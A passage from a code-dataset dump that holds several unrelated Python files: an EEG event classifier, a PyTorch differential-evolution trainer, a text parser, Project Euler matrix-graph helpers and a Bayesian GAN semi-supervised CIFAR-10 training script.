a jejich targetove/non-targetove znacky\r\nfiles_training_map = load_file_names.load_training_data_names()\r\n\r\n# mapu, ve ktere jsou ulozeny nazvy testovacich souboru a jejich targetove nazvy\r\nfiles_testing_map = load_file_names.load_predicting_data_names()\r\n\r\n\r\n\r\ndata_training_count = len(files_training_map)\r\ndata_predicting_count = len(files_testing_map)\r\n\r\n##############################################\r\n#\r\n# Loading data to train\r\n#\r\n##############################################\r\nraw = []\r\nfor i in range(data_training_count):\r\n path = DATA_FOLDER + (files_training_map[i][0])\r\n raw.append(io.read_raw_brainvision(vhdr_fname=path, preload=True))\r\n raw[i].filter(config.low_filter_frequency,config.high_filter_frequency)\r\n# print(raw[i]._events)\r\n\r\n##############################################\r\n#\r\n# Loading data to predict\r\n#\r\n##############################################\r\nraw_to_predict = []\r\ntrue_prediction = []\r\nfor i in range(data_predicting_count):\r\n path = DATA_FOLDER + (files_testing_map[i][0])\r\n true_prediction.append(files_testing_map[i][1])\r\n true_prediction[i] = true_prediction[i].strip()\r\n raw_to_predict.append(io.read_raw_brainvision(vhdr_fname=path, preload=True))\r\n raw_to_predict[i].filter(config.low_filter_frequency,config.high_filter_frequency)\r\n\r\n \r\n##############################################\r\n#\r\n# Epochs creating\r\n#\r\n##############################################\r\n \r\n# Vytvori epochy pro klasifikaci\r\nevent_to_predict = []\r\nepochs_to_predict = []\r\nfor i in range(data_predicting_count):\r\n event_to_predict.append(raw_to_predict[i]._events)\r\n \r\n if(i < config.instruction_files_to_pred):\r\n\r\n epochs_to_predict.append(mne.Epochs(raw_to_predict[i],event_to_predict[i], event_id=config.event_id_instruction, tmin=config.epoch_tmin, tmax=config.epoch_tmax,baseline=(config.baseline_min, config.baseline_max), preload=True))\r\n else:\r\n epochs_to_predict.append(mne.Epochs(raw_to_predict[i],event_to_predict[i], event_id=config.event_id_matrix, tmin=config.epoch_tmin, tmax=config.epoch_tmax,baseline=(config.baseline_min, config.baseline_max), preload=True))\r\n \r\n \r\n\r\n# Plot raw data\r\n# raw[0].plot(block=True, lowpass=40, n_channels=5)\r\n\r\n# for i in range(data_count): \r\n# raw[i].plot(block=True, lowpass=40, n_channels=6)\r\n\r\n##############################################\r\n#\r\n# \r\n#\r\n##############################################\r\n\r\n\r\n\r\n\r\n# Set color of events\r\n\"\"\"\r\n\r\n\r\nfor i in range(data_count):\r\n mne.viz.plot_events(events[i],raw[i].info['sfreq'], raw[i].first_samp, color=config.color)\r\n \"\"\"\r\n\r\n#extract epochs\r\n\r\nevents_train = []\r\nepochs = []\r\nepochs_targets = []\r\nepochs_non_targets = []\r\n\r\n\r\n\r\n# Vytvori epochy, z vytvorenych Epoch potom vybere ty targetove a ulozi je do epochs_target\r\n\r\nfor i in range(data_training_count):\r\n events_train.append(raw[i]._events)\r\n \r\n if(i < config.instruction_files_count):\r\n epochs.append(mne.Epochs(raw[i],events_train[i], event_id=config.event_id_instruction, tmin=config.epoch_tmin, tmax=config.epoch_tmax,baseline=(config.baseline_min, config.baseline_max), preload=True))\r\n instruction = 1\r\n else:\r\n epochs.append(mne.Epochs(raw[i],events_train[i], event_id=config.event_id_matrix, tmin=config.epoch_tmin, tmax=config.epoch_tmax,baseline=(config.baseline_min, config.baseline_max), preload=True))\r\n instruction = 0\r\n \r\n epochs_targets.append(epoch_met.filter_epochs_target(epochs[i], events_train[i], files_training_map[i][1], instruction)) \r\n epochs_non_targets.append(epoch_met.filter_epochs_target(epochs[i], events_train[i], files_training_map[i][2], instruction)) \r\n \r\n\r\n\r\n\"\"\"\r\nfor i in range(data_count):\r\n mne.viz.plot_epochs(epochs[i])\r\n\"\"\"\r\n\r\n# epochs.plot(title=\"Events epochs\", n_epochs=(len(epochs.events)),event_colors=color)\r\n# mne.viz.plot_epochs(epochs, title=\"Events epochs\", n_epochs=15,event_colors=color)\r\n\r\n\r\n\r\n# Create evoked structure\r\n\r\nevoked_dict = [[]]\r\n# jen pro instruction\r\nfor i in range(config.instruction_files_count):\r\n evoked_dict.append('')\r\n evoked_dict[i] = dict()\r\n for condition in config.conditions:\r\n evoked_dict[i][condition] = epochs[i][condition].average()\r\n \r\n\r\n# Plot chart \r\n\r\n\"\"\"\r\nfor i in range(data_count):\r\n mne.viz.plot_compare_evokeds(evoked_dict[i], title=\"ERP chart\", colors=config.colors, linestyles=config.linestyles, gfp=False)\r\n\"\"\"\r\n\r\n\"\"\"\r\n\r\nExtrakce priznaku\r\n\r\n\"\"\"\r\nlabels = epochs[0].events[:, -1]\r\n\r\n#feature extraction\r\n \r\ntarget_features = []\r\nnon_target_features = []\r\nx = []\r\n\r\n\r\ntest_sample_count = 5\r\n\r\n\r\ny = []\r\n\r\n\r\n# Prepare data to training \r\ntarget_nontarget_epochs = epochs_targets + epochs_non_targets\r\n\r\n\r\nfor i in range(len(target_nontarget_epochs)):\r\n #count of target epochs \r\n for j in range(len(target_nontarget_epochs[i])):\r\n \r\n pick_epochs = target_nontarget_epochs[i][j].pick_channels(config.chan)\r\n x.append(ft.feature_vector(pick_epochs))\r\n if(i < epochs_targets.__len__()):\r\n y.append(1)\r\n else:\r\n y.append(0)\r\n\r\n\r\n# Prepare data to predict \r\nx_pred = []\r\n\r\ny = np.array(y)\r\n\r\nfor i in range(data_predicting_count):\r\n x_pred.append([])\r\n for j in range(len(epochs_to_predict[i])):\r\n pick_epoch_to_predict = epochs_to_predict[i][j].pick_channels(config.chan)\r\n x_pred[i].append(ft.feature_vector(pick_epoch_to_predict))\r\n\r\n\r\n\r\n\r\nmix.mix_data(x, y)\r\n\r\n# X = np.reshape(X,(-1, 100))\r\n\r\n##############################################\r\n#\r\n# Predicting\r\n#\r\n##############################################\r\n\r\n# plotting means of training data\r\n# plt.plot(np.mean(X[y==1], axis=0))\r\n# plt.plot(np.mean(X[y==0], axis=0))\r\n# plt.show()\r\n\r\n\r\n# plotting tests epochs\r\n# for i in range(len(X_pred)):\r\n# name = str(i)+'.png'\r\n# plt.plot(X_pred[i])\r\n# plt.savefig(name)\r\n\r\n\r\n\r\nx_event_lda = []\r\nx_event_neural = []\r\n\r\nprint()\r\nprint(\"If you want to load model from file: 1\")\r\nprint(\"If you want to train new model : 0\")\r\nprint()\r\nmodel_load = input(\"Load model? 1/0: \")\r\nif(model_load == '1'):\r\n config.model = load_model('save_models/mymodel_5.h5') \r\nelse:\r\n if(model_load == '0'):\r\n neural_network.train(x, y)\r\n else:\r\n print(\"Invalid option\")\r\n\r\n\r\nfor i in range(data_predicting_count):\r\n x_event_lda.append(lda.solve(x,y,x_pred[i]))\r\n x_event_neural.append(neural_network.solve(x_pred[i]))\r\n\r\n\r\nfor i in range(data_predicting_count):\r\n print()\r\n print(\"##########################################\")\r\n print()\r\n \r\n \r\n if(i < config.instruction_files_to_pred):\r\n \r\n print(i+1,\".) Expected solve: \",true_prediction[i])\r\n print()\r\n \r\n instruction = 1\r\n print(\"LDA: \")\r\n print_results.print_guess(x_event_lda[i], epochs_to_predict[i], true_prediction[i],instruction)\r\n print(\"Neural network: \")\r\n print_results.print_guess(x_event_neural[i], epochs_to_predict[i], true_prediction[i],instruction)\r\n \r\n else:\r\n if(i%2==1):\r\n print(i+1,\".) Expected solve: \",true_prediction[i],true_prediction[i+1])\r\n \r\n print()\r\n \r\n instruction = 0\r\n print(\"LDA: \")\r\n print_results.print_guess(x_event_lda[i], epochs_to_predict[i], true_prediction[i],instruction)\r\n print(\"Neural network: \")\r\n print_results.print_guess(x_event_neural[i], epochs_to_predict[i], true_prediction[i],instruction)\r\n \r\n print()\r\n\r\n\r\n\r\n\r\n","repo_name":"medunova/Classificator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2961502300","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom operator import itemgetter\nfrom datetime import datetime\nimport copy\nimport torch\n\n\nclass DE:\n\n def __init__(self, objective_function, population_function, X, y, Xtest=None, ytest=None, pop_size=50,\n F=0.5, cr=0.5, start_agent=None, use_cuda=False):\n if use_cuda and torch.cuda.is_available:\n self.device = torch.device('cuda')\n print('Using GPU')\n else:\n self.device = torch.device('cpu')\n self.obj = objective_function\n self.X = X.to(self.device)\n self.y = y.long().to(self.device)\n self.N = pop_size\n self.pop_func = population_function\n self.F = torch.Tensor([F]).to(self.device)\n self.cr = torch.Tensor([cr]).to(self.device)\n self.pop = [population_function().to(self.device) for i in range(pop_size)]\n self.testNN = population_function().to(self.device)\n self.testcost = False\n if start_agent is not None:\n self.pop[0] = copy.deepcopy(start_agent)\n if Xtest is not None and ytest is not None:\n self.Xtest = Xtest.to(self.device)\n self.ytest = ytest.long().to(self.device)\n self.testcost = True\n\n def save_model(self, fname, path='../Conv1DModels/', agent=None):\n if agent is None:\n agent = self.best_agent\n torch.save(agent, path+fname)\n\n def load_model(self, fname, path='../Conv1DModels/'):\n return torch.load(path+fname)\n\n def NN_obj(self, agent):\n yhat = agent(self.X)[0].T\n return self.obj(yhat, self.y)\n\n def mutation(self, nets):\n\n for testp, p1, p2, p3 in zip(*[net.parameters() for net in nets]):\n testp.data = p1 + self.F * (p2 - p3)\n\n pass\n\n def crossover(self, target):\n\n for dw, tw in zip(self.testNN.parameters(), target.parameters()):\n crit = torch.rand(dw.shape, device=self.device) < self.cr\n trial_w = crit * dw + ~crit * tw\n dw.data = trial_w\n\n pass\n\n def evolution(self, num_epochs, verbose=False, print_epoch=1000):\n # evaluate the initialized population with the objective function\n obj_all = torch.Tensor([self.NN_obj(agent) for agent in self.pop])\n\n # find the best agent within the initial population\n self.best_agent = self.pop[torch.argmin(obj_all)]\n\n best_obj = torch.min(obj_all)\n prev_obj = best_obj\n\n self.best_objs = np.zeros(num_epochs + 1)\n self.best_objs[0] = best_obj\n\n if self.testcost:\n self.best_test_objs = np.zeros(num_epochs + 1)\n self.best_test_objs[0] = self.obj(self.best_agent(self.Xtest)[0].T, self.ytest)\n\n for i in range(num_epochs):\n for j, x in enumerate(self.pop):\n\n choice = np.random.choice(np.delete(np.arange(self.N), j), 3, replace=False)\n a, b, c = itemgetter(*choice)(self.pop)\n # a, b, c = self.pop[np.random.choice(np.delete(np.arange(self.N), j), 3, replace=False)]\n\n # Mutation\n self.mutation([self.testNN, a, b, c])\n\n # Crossover\n self.crossover(x)\n\n # Selection\n obj_u = self.NN_obj(self.testNN)\n if obj_u < self.NN_obj(x):\n self.pop[j] = copy.deepcopy(self.testNN)\n obj_all[j] = obj_u\n\n # update the current best objective function value\n best_obj = torch.min(obj_all)\n self.best_objs[i + 1] = best_obj\n\n if best_obj < prev_obj:\n # update best agent\n self.best_agent = self.pop[torch.argmin(obj_all)]\n # update previous solution to use for next iteration\n prev_obj = best_obj\n\n if self.testcost:\n self.best_test_objs[i + 1] = self.obj(self.best_agent(self.Xtest)[0].T, self.ytest)\n\n if verbose and i % print_epoch == 0:\n # report progress at each iteration\n print('%d: cost= %.5f' % (i, best_obj))\n print('%d: testcost= %.5f' % (i, self.best_test_objs[i + 1]))\n print('%d: acc= %.5f' % (i, self.accuracy(self.best_agent(self.X), self.y)))\n print('%d: testacc= %.5f' % (i, self.accuracy(self.best_agent(self.Xtest), self.ytest)))\n plt.plot(list(self.best_agent.parameters())[0].cpu().detach()[0][0])\n plt.show()\n\n return self.best_agent\n\n def evaluate(self, plot_function=None, agent=None, bounds=None, title=' '):\n\n if agent is None:\n agent = self.best_agent\n plt.figure(figsize=(13, 8))\n plt.plot(range(len(self.best_objs)), self.best_objs)\n plt.plot(range(len(self.best_test_objs)), self.best_test_objs)\n plt.title('Training Graph', fontsize=24)\n plt.xlabel('Iterations', fontsize=20)\n plt.ylabel('Cost', fontsize=20)\n plt.legend(['Train', 'Test'], fontsize=14)\n plt.show()\n\n if plot_function is not None:\n plot_function(agent, self.Xtest, self.ytest, title=title, savefig=False)\n\n print(f\"Best agent is {agent} with a train cost of {np.round(self.NN_obj(agent).cpu().detach(), 5)}.\")\n print(f\"And a test cost of {np.round(self.obj(agent(self.Xtest)[0].T, self.ytest).cpu().detach(), 5)}\")\n\n # print(f\"Worst initialization was {self.initial_worst_agent} with a cost of \\\n # {np.round(self.obj(self.initial_worst_agent), 2)}.\")\n\n pass\n\n def accuracy(self, predictions, ytest):\n predictions = predictions.argmax(axis=1)\n correct_preds = ytest == predictions\n return torch.sum(correct_preds) / len(ytest)\n\n def early_stop_training(self, patience, measure='cost', eval=True, v=True):\n\n n = 1\n iterations = 0\n if measure == 'cost':\n no_iterations_rising = 0\n val_error = 20000\n obj_all = torch.Tensor([self.NN_obj(agent) for agent in self.pop])\n self.opt_agent = copy.deepcopy(self.pop[torch.argmin(obj_all)])\n opt_iterations = iterations\n testcosts = []\n\n while (no_iterations_rising < patience):\n self.evolution(num_epochs=n, verbose=False, print_epoch=1)\n iterations = iterations + n\n val_error_new = self.obj(self.best_agent(self.Xtest)[0].T, self.ytest)\n testcosts.append(val_error_new.item())\n if (val_error_new < val_error):\n if v: print(f\"{iterations}: Test Cost Falling {val_error_new}\")\n no_iterations_rising = 0\n self.opt_agent = copy.deepcopy(self.best_agent)\n opt_iterations = iterations\n val_error = val_error_new\n else:\n no_iterations_rising += n\n\n testcosts = np.array(testcosts)\n if v:\n print(\"Optimal number of iterations:\", opt_iterations)\n print(\"Best error:\", val_error)\n print(\"Error at stop:\", val_error_new)\n\n elif measure == 'accuracy':\n no_iterations_falling = 0\n val_acc = 0\n opt_iterations = iterations\n testcosts = []\n obj_all = torch.Tensor([self.NN_obj(agent) for agent in self.pop])\n self.opt_agent = copy.deepcopy(self.pop[torch.argmin(obj_all)])\n\n while (no_iterations_falling < patience):\n self.evolution(num_epochs=n, verbose=False, print_epoch=1)\n iterations = iterations + n\n val_acc_new = self.accuracy(self.best_agent(self.Xtest), self.ytest)\n testcosts.append(val_acc_new.item())\n if (val_acc_new > val_acc):\n if v: print(f\"{iterations}: Test Accuracy Rising {val_acc_new}\")\n no_iterations_falling = 0\n self.opt_agent = copy.deepcopy(self.best_agent)\n opt_iterations = iterations\n val_acc = val_acc_new\n else:\n no_iterations_falling += n\n # print(\"Falling or the same\")\n\n if v:\n print(\"Optimal number of iterations:\", opt_iterations)\n print(\"Best accuracy:\", val_acc)\n print(\"Accuracy at stop:\", val_acc_new)\n\n if eval:\n plt.figure(figsize=(13, 8))\n plt.plot(testcosts)\n plt.title('Test Cost Graph', fontsize=24)\n plt.xlabel('Iterations', fontsize=20)\n plt.ylabel('Test Cost', fontsize=20)\n plt.show()\n\n return self.best_agent, self.opt_agent\n\n\n\n\n\n\n","repo_name":"FaxMan1/Master-Thesis","sub_path":"DE_Pytorch.py","file_name":"DE_Pytorch.py","file_ext":"py","file_size_in_byte":8792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31947234242","text":"import sys\n\nresult = {}\nif __name__ == '__main__':\n for ln in sys.stdin:\n try:\n split = ln.split()\n od = split[0]\n for idx, val in enumerate(split[3].split(\";\")):\n if val.split(\":\")[2] == \"1\":\n key = od + \"_\" + val.split(\"|\")[0]\n if not result.has_key(key):\n result[key] = set([])\n result[key].add(split[1])\n except Exception as e:\n print(\"error:\", e)\n\n for key, val in result.iteritems():\n f = open(\"xunfei\" + key, \"a\")\n for m in val:\n f.write(m + \"\\n\")\n f.close()\n","repo_name":"chenfangzhi123/pyDemo","sub_path":"count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25913055736","text":"# common matrix functions for 081, 082 and 083\nfrom dijkstra import Node\n\ndef load_matrix_from_file(filename):\n matrix = []\n f = open(filename, \"r\")\n for line in f:\n matrix.append([int(x) for x in line.strip().split(\",\")]) \n f.close()\n return matrix\n\ndef node_at(nd,x,y,value):\n key = \"{},{}\".format(x,y)\n if key in nd:\n return nd[key]\n node = Node(value)\n nd[key] = node\n return node\n\ndef convert_matrix_to_graph(m,\n include_right=False,include_left=False,include_down=False,include_up=False):\n nd = {} # node dictionary, key = \"1,5\" index in matrix\n all_nodes = []\n for x,row in enumerate(m):\n for y,value in enumerate(row):\n curr = node_at(nd, x, y, value)\n all_nodes.append(curr)\n if include_right and y < len(row)-1:\n right = node_at(nd, x, y+1, m[x][y+1])\n curr.add_neighbor(right)\n if include_left and y > 0:\n left = node_at(nd, x, y-1, m[x][y-1])\n curr.add_neighbor(left)\n if include_down and x < len(m)-1:\n down = node_at(nd, x+1, y, m[x+1][y])\n curr.add_neighbor(down)\n if include_up and x > 0:\n up = node_at(nd, x-1, y, m[x-1][y])\n curr.add_neighbor(up)\n return all_nodes\n","repo_name":"MrDeshaies/NOT-projecteuler.net","sub_path":"euler_081_083_matrix.py","file_name":"euler_081_083_matrix.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38063729425","text":"# # Training\n# \n# We show that Bayesian GAN can capture the data distribution by measuring its performance in the semi-supervised setting. We will perform the posterior update as outline in Algorithm 1 in Saatchi (2017). This algorithm can be implemented quite simply by adding noise to standard optimizers such as SGD with momentum and keep track of the parameters we sample from the posterior. \n\n# ![Posterior Sampling Algorithm](figs/bgan_alg1.png)\n\n# ### SGHMC by Optimizing a Noisy Loss\n# \n# First, observe that the update rules are similar to momentum SGD except for the noise $\\boldsymbol{n}$. In fact, without $\\boldsymbol{n}$, this is equivalent to performing momentum SGD with the loss is $- \\sum_{i=1}{J_g} \\sum_{k=1}^{J_d} \\log \\text{posterior} $. We will describe the case where $J_g = J_d=1$ for simplicity. \n# \n# We use the main loss $\\mathcal{L} = - \\log p(\\theta | ..)$ and add a noise loss $\\mathcal{L}_\\text{noise} = \\frac{1}{\\eta} \\theta \\cdot \\boldsymbol{n}$ where $\\boldsymbol{n} \\sim \\mathcal{N}(0, 2 \\alpha \\eta I)$ so that optimizing the loss function $\\mathcal{L} + \\mathcal{L}_\\text{noise}$ with momentum SGD is equivalent to performing the SGHMC update step. \n# \n# Below (Equation 3 and 4) are the posterior probabilities where each error term corresponds its negative log probability.\n\n# ![Posterior Distributions](figs/posterior_eqs2.png)\n\n#from __future__ import print_function\nimport os, pickle\nimport numpy as np\nimport random, math\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\nfrom statsutil import AverageMeter, accuracy\nfrom tensorboard_logger import configure, log_value\n\n# Default Parameters\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataset', default='cifar10')\nparser.add_argument('--imageSize', type=int, default=32)\nparser.add_argument('--batchSize', type=int, default=64, help='input batch size')\nparser.add_argument('--nz', type=int, default=100, help='size of the latent z vector')\nparser.add_argument('--niter', type=int, default=2, help='number of epochs to train for')\nparser.add_argument('--lr', type=float, default=0.0002, help='learning rate, default=0.0002')\nparser.add_argument('--cuda', type=int, default=1, help='enables cuda')\nparser.add_argument('--ngpu', type=int, default=1, help='number of GPUs to use')\nparser.add_argument('--outf', default='modelfiles/pytorch_demo3', help='folder to output images and model checkpoints')\nparser.add_argument('--numz', type=int, default=1, help='The number of set of z to marginalize over.')\nparser.add_argument('--num_mcmc', type=int, default=10, help='The number of MCMC chains to run in parallel')\nparser.add_argument('--num_semi', type=int, default=4000, help='The number of semi-supervised samples')\nparser.add_argument('--gnoise_alpha', type=float, default=0.0001, help='')\nparser.add_argument('--dnoise_alpha', type=float, default=0.0001, help='')\nparser.add_argument('--d_optim', type=str, default='adam', choices=['adam', 'sgd'], help='')\nparser.add_argument('--g_optim', type=str, default='adam', choices=['adam', 'sgd'], help='')\nparser.add_argument('--stats_interval', type=int, default=10, help='Calculate test accuracy every interval')\nparser.add_argument('--tensorboard', type=int, default=1, help='')\nparser.add_argument('--bayes', type=int, default=1, help='Do Bayesian GAN or normal GAN')\nimport sys; sys.argv=['']; del sys\nopt = parser.parse_args()\ntry:\n os.makedirs(opt.outf)\nexcept OSError:\n print(\"Error Making Directory\", opt.outf)\n pass\nif opt.tensorboard: configure(opt.outf)\n\n# First, we construct the data loader for full training set \n# as well as the data loader of a partial training set for semi-supervised learning\n# transformation operator\nnormalize = transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\ntransform_opt = transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])\n# get training set and test set\ndataset = dset.CIFAR10(root=\"./cifar10\", download=True,\n transform=transform_opt) \ndataloader = torch.utils.data.DataLoader(dataset, batch_size=opt.batchSize,\n shuffle=True, num_workers=0)\n\nfrom partial_dataset import PartialDataset\n# partial dataset for semi-supervised training\ndataset_partial = PartialDataset(dataset, opt.num_semi)\n\n\n# test set for evaluation\ndataset_test = dset.CIFAR10(root=\"./cifar10\",\n train=False,\n transform=transform_opt)\ndataloader_test = torch.utils.data.DataLoader(dataset_test,\n batch_size=opt.batchSize, shuffle=False, pin_memory=True, num_workers=0)\n\ndataloader_semi = torch.utils.data.DataLoader(dataset_partial, batch_size=opt.batchSize,\n shuffle=True, num_workers=0)\n\n\n# Now we initialize the distributions of G and D\n##### Generator ######\n# opt.num_mcmc is the number of MCMC chains that we run in parallel\n# opt.numz is the number of noise batches that we use. We also use different parameter samples for different batches\n# we construct opt.numz * opt.num_mcmc initial generator parameters\n# We will keep sampling parameters from the posterior starting from this set\n# Keeping track of many MCMC chains can be done quite elegantly in Pytorch\nfrom utils.BayesianCGANModels.discriminators import _BayesianLeNetD, _netD\nfrom utils.BayesianCGANModels.generators import _BayesianNetG #_netG\nfrom statsutil import weights_init\nnetGs = []\nfor _idxz in range(opt.numz):\n for _idxm in range(opt.num_mcmc):\n netG = _BayesianNetG(noize=opt.nz)\n #netG.apply(weights_init)\n netGs.append(netG)\n \n##### Discriminator ######\n# We will use 1 chain of MCMCs for the discriminator\n# The number of classes for semi-supervised case is 11; that is,\n# index 0 for fake data and 1-10 for the 10 classes of CIFAR.\nnum_classes = 11\nnetD = _netD(opt.ngpu, num_classes=num_classes)\n#netD = _BayesianLeNetD(1,3)\n\n# In order to calculate errG or errD_real, we need to sum the probabilities over all the classes (1 to K)\n# ComplementCrossEntropyLoss is a loss function that performs this task\n# We can specify a default except_index that corresponds to a fake label. In this case, we use index=0\nfrom ComplementCrossEntropyLoss import ComplementCrossEntropyLoss\ncriterion = nn.CrossEntropyLoss()\n# use the default index = 0 - equivalent to summing all other probabilities\ncriterion_comp = ComplementCrossEntropyLoss(except_index=0)\n\n\nfrom utils.BayesianCGANModels.distributions import Normal\nfrom utils.BayesianCGANModels.bayes import NoiseLoss, PriorLoss\n# Finally, initialize the ``optimizers''\n# Since we keep track of a set of parameters, we also need a set of\n# ``optimizers''\nif opt.d_optim == 'adam':\n optimizerD = optim.Adam(netD.parameters(), lr=opt.lr, betas=(0.5, 0.999))\nelif opt.d_optim == 'sgd':\n optimizerD = torch.optim.SGD(netD.parameters(), lr=opt.lr,\n momentum=0.9,\n nesterov=True,\n weight_decay=1e-4)\noptimizerGs = []\nfor netG in netGs:\n optimizerG = optim.Adam(netG.parameters(), lr=opt.lr, betas=(0.5, 0.999))\n optimizerGs.append(optimizerG)\n\n# since the log posterior is the average per sample, we also scale down the prior and the noise\ngprior_criterion = PriorLoss(prior_std=1., observed=1000.)\ngnoise_criterion = NoiseLoss(params=netGs[0].parameters(), scale=math.sqrt(2*opt.gnoise_alpha/opt.lr), observed=1000.)\ndprior_criterion = PriorLoss(prior_std=1., observed=50000.)\ndnoise_criterion = NoiseLoss(params=netD.parameters(), scale=math.sqrt(2*opt.dnoise_alpha*opt.lr), observed=50000.)\n\n\n# Fixed noise for data generation\nfixed_noise = torch.FloatTensor(opt.batchSize, opt.nz, 1, 1).normal_(0, 1).cuda()\nfixed_noise = Variable(fixed_noise)\n\n# initialize input variables and use CUDA (optional)\ninput = torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)\nnoise = torch.FloatTensor(opt.batchSize, opt.nz, 1, 1)\nlabel = torch.FloatTensor(opt.batchSize)\nreal_label = 1\nfake_label = 0\n\nif opt.cuda:\n netD.cuda()\n for netG in netGs:\n netG.cuda()\n criterion.cuda()\n criterion_comp.cuda()\n input, label = input.cuda(), label.cuda()\n noise = noise.cuda()\n\n\n# fully supervised\n#netD_fullsup = _BayesianLeNetD(1,3)\nnetD_fullsup = _netD(opt.ngpu, num_classes=num_classes)\nnetD_fullsup.apply(weights_init) #was not commented out\ncriterion_fullsup = nn.CrossEntropyLoss()\nif opt.d_optim == 'adam':\n optimizerD_fullsup = optim.Adam(netD_fullsup.parameters(), lr=opt.lr, betas=(0.5, 0.999))\nelse:\n optimizerD_fullsup = optim.SGD(netD_fullsup.parameters(), lr=opt.lr,\n momentum=0.9,\n nesterov=True,\n weight_decay=1e-4)\nif opt.cuda:\n netD_fullsup.cuda()\n criterion_fullsup.cuda()\n\n\n# We define a class to calculate the accuracy on test set\n# to test the performance of semi-supervised training\ndef get_test_accuracy(model_d, iteration, label='semi'):\n # don't forget to do model_d.eval() before doing evaluation\n top1 = AverageMeter()\n for i, (input, target) in enumerate(dataloader_test):\n target = target.cuda()\n input = input.cuda()\n input_var = torch.autograd.Variable(input.cuda(), volatile=True)\n target_var = torch.autograd.Variable(target, volatile=True)\n output = model_d(input_var)\n\n probs = output.data[:, 1:] # discard the zeroth index\n prec1 = accuracy(probs, target, topk=(1,))[0]\n #top1.update(prec1[0], input.size(0))\n top1.update(prec1, input.size(0))\n if i % 50 == 0:\n print(\"{} Test: [{}/{}]\\t Prec@1 {top1.val:.3f} ({top1.avg:.3f})\".format(label, i, len(dataloader_test), top1=top1))\n print('{label} Test Prec@1 {top1.avg:.2f}'.format(label=label, top1=top1))\n log_value('test_acc_{}'.format(label), top1.avg, iteration)\n\n\niteration = 0\nfor epoch in range(opt.niter):\n top1 = AverageMeter()\n top1_weakD = AverageMeter()\n for i, data in enumerate(dataloader):\n iteration += 1\n #######\n # 1. real input\n netD.zero_grad()\n _input, _ = data\n batch_size = _input.size(0)\n if opt.cuda:\n _input = _input.cuda()\n input.resize_as_(_input).copy_(_input) \n label.resize_(batch_size).fill_(real_label) \n inputv = Variable(input)\n labelv = Variable(label)\n \n output = netD(inputv)#used to have no [0] index\n print(output.shape)\n errD_real = criterion_comp(output)\n errD_real.backward()\n # calculate D_x, the probability that real data are classified \n D_x = 1 - torch.nn.functional.softmax(output).data[:, 0].mean()\n \n #######\n # 2. Generated input\n fakes = []\n for _idxz in range(opt.numz):\n noise.resize_(batch_size, opt.nz, 1, 1).normal_(0, 1)\n noisev = Variable(noise)\n for _idxm in range(opt.num_mcmc):\n idx = _idxz*opt.num_mcmc + _idxm\n netG = netGs[idx]\n _fake = netG(noisev)[0]\n fakes.append(_fake)\n fake = torch.cat(fakes)\n output = netD(fake.detach())#used to have no [0] index\n labelv = Variable(torch.LongTensor(fake.data.shape[0]).cuda().fill_(fake_label))\n errD_fake = criterion(output, labelv)\n errD_fake.backward()\n \n D_G_z1 = 1 - torch.nn.functional.softmax(output).data[:, 0].mean()\n \n #######\n # 3. Labeled Data Part (for semi-supervised learning)\n for ii, (input_sup, target_sup) in enumerate(dataloader_semi):\n input_sup, target_sup = input_sup.cuda(), target_sup.cuda()\n break\n input_sup_v = Variable(input_sup.cuda())\n # convert target indicies from 0 to 9 to 1 to 10\n target_sup_v = Variable( (target_sup + 1).cuda())\n output_sup = netD(input_sup_v) #used to have no [0] index\n err_sup = criterion(output_sup, target_sup_v)\n err_sup.backward()\n prec1 = accuracy(output_sup.data, target_sup + 1, topk=(1,))[0]\n #top1.update(prec1[0], input_sup.size(0))\n top1.update(prec1,input_sup.size(0))\n if opt.bayes:\n errD_prior = dprior_criterion(netD.parameters())\n errD_prior.backward()\n errD_noise = dnoise_criterion(netD.parameters())\n errD_noise.backward()\n errD = errD_real + errD_fake + err_sup + errD_prior + errD_noise\n else:\n errD = errD_real + errD_fake + err_sup\n optimizerD.step()\n \n # 4. Generator\n for netG in netGs:\n netG.zero_grad()\n labelv = Variable(torch.FloatTensor(fake.data.shape[0]).cuda().fill_(real_label))\n output = netD(fake)\n errG = criterion_comp(output)\n if opt.bayes:\n for netG in netGs:\n errG += gprior_criterion(netG.parameters())\n errG += gnoise_criterion(netG.parameters())\n errG.backward()\n D_G_z2 = 1 - torch.nn.functional.softmax(output).data[:, 0].mean()\n for optimizerG in optimizerGs:\n optimizerG.step()\n \n # 5. Fully supervised training (running in parallel for comparison)\n netD_fullsup.zero_grad()\n input_fullsup = Variable(input_sup)\n target_fullsup = Variable((target_sup + 1))\n output_fullsup = netD_fullsup(input_fullsup)#used to have no [0] index\n err_fullsup = criterion_fullsup(output_fullsup, target_fullsup)\n optimizerD_fullsup.zero_grad()\n err_fullsup.backward()\n optimizerD_fullsup.step()\n \n # 6. get test accuracy after every interval\n if iteration % opt.stats_interval == 0:\n # get test accuracy on train and test\n netD.eval()\n get_test_accuracy(netD, iteration, label='semi')\n get_test_accuracy(netD_fullsup, iteration, label='sup')\n netD.train()\n \n # 7. Report for this iteration\n cur_val, ave_val = top1.val, top1.avg\n log_value('train_acc', top1.avg, iteration)\n #print('[%d/%d][%d/%d] Loss_D: %.2f Loss_G: %.2f D(x): %.2f D(G(z)): %.2f / %.2f | Acc %.1f / %.1f' % (epoch, opt.niter, i, len(dataloader),errD.data[0], errG.data[0], D_x, D_G_z1, D_G_z2, cur_val, ave_val))\n print('[%d/%d][%d/%d] Loss_D: %.2f Loss_G: %.2f D(x): %.2f D(G(z)): %.2f / %.2f 